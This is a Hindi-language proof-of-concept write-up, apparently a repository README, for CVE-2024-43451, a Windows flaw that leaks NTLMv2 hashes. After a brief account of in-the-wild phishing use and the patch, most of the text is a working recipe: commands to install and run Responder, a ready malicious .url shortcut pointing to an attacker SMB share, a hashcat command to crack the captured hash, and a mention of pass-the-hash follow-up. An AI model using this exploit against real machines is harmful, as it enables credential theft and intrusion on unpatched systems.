
CVE-2024-43451 एक Windows NTLM कमजोरी है जो एक हमलावर को दुर्भावनापूर्ण शॉर्टकट का उपयोग करके प्रमाणीकरण को मजबूर करने और NTLM हैश कैप्चर करने की अनुमति देती है।
CVE-2024-43451 Microsoft Windows में एक जीरो-डे कमज़ोरी है जो हमलावरों को उपयोगकर्ता से न्यूनतम इंटरैक्शन के साथ NTLMv2 पासवर्ड हैश कैप्चर करने की अनुमति देती है, जिससे क्रेडेंशियल चोरी हो सकती है। एक सामान्य शोषण विधि में हैश कैप्चर करने के लिए दूरस्थ सर्वर पर SMB कनेक्शन पर NTLM प्रमाणीकरण का लाभ उठाना शामिल है। इस कमज़ोरी को नवंबर 2024 के अपडेट में पैच किया गया था। उपयोगकर्ताओं को जोखिम को कम करने के लिए प्रासंगिक सुरक्षा अपडेट लागू करने की सलाह दी जाती है।
यह हमला एक समझौता किए गए यूक्रेनी सरकारी सर्वर से भेजे गए फ़िशिंग ईमेल का उपयोग करके सक्रिय रूप से शोषण करते हुए पाया गया था। ईमेल में एक दुर्भावनापूर्ण URL फ़ाइल शामिल है। जब उपयोगकर्ता फ़ाइल पर राइट-क्लिक करके, हटाकर या स्थानांतरित करके इंटरैक्ट करता है, तो कमज़ोरी सक्रिय हो जाती है। यह हमलावर के सर्वर से कनेक्शन शुरू करता है, जिससे SparkRAT मैलवेयर (एक ओपन-सोर्स रिमोट एक्सेस ट्रोजन जो हमलावर को पीड़ित के सिस्टम का नियंत्रण प्राप्त करने की अनुमति देता है) जैसी अधिक दुर्भावनापूर्ण फ़ाइलें डाउनलोड होती हैं।
NTLMv2 वर्तमान में सबसे सुरक्षित संस्करण है और आज सबसे अधिक प्रासंगिक है।
image
इस POC के लिए एक कार्यशील वातावरण बनाने के लिए हमें नवंबर 2024 से पहले जारी बिल्ड नंबर वाली एक लक्ष्य Windows मशीन और हैश कैप्चर करने का अनुकरण करने के लिए एक दूरस्थ सर्वर सेटअप करना होगा:
Responder डाउनलोड और इंस्टॉल करें:
brew install python3
git clone https://github.com/lgandx/Responder.git
cd Responder
sudo python3 Responder.py -I <अपना नेटवर्क इंटरफ़ेस डालें> -v
\\(दूरस्थ सर्वर IP) टाइप करके रिस्पॉन्डर सेटअप का परीक्षण करें:
चूंकि एक्सप्लॉइट को केवल दूरस्थ सर्वर के साथ SMB कनेक्शन बनाने की आवश्यकता है, हम इसका अनुकरण करने के लिए एक सरल फ़ाइल का उपयोग कर सकते हैं:
[InternetShortcut]
URL=\\(दूरस्थ सर्वर IP)\share
IconIndex=32
IconFile=C:\Windows\System32\shell32.dll
एक बार फ़ाइल तैयार हो जाने और लक्ष्य सिस्टम पर वितरित हो जाने पर, हैश चुराने के लिए न्यूनतम उपयोगकर्ता इंटरैक्शन की आवश्यकता होती है। इस इंटरैक्शन में निम्नलिखित में से कोई भी कार्रवाई शामिल हो सकती है:
https://github.com/user-attachments/assets/fd6389b5-4ee9-4d90-a76e-562394b24058
https://github.com/user-attachments/assets/b820ea73-b0fc-40f1-920e-28cf7869f1e2
अनएन्क्रिप्टेड हैश प्राप्त होने पर, हम या तो इसे क्रैक करके सादे टेक्स्ट पासवर्ड प्रकट करने का प्रयास कर सकते हैं
या Mimikatz या Metasploit जैसे टूल के साथ "पास-द-हैश" हमले में इसका उपयोग कर सकते हैं।
हमारे मामले में एक सरल Hashcat कमांड मेरा पासवर्ड प्रकट करता है:
hashcat -m 5600 leak.txt rockyou.txt
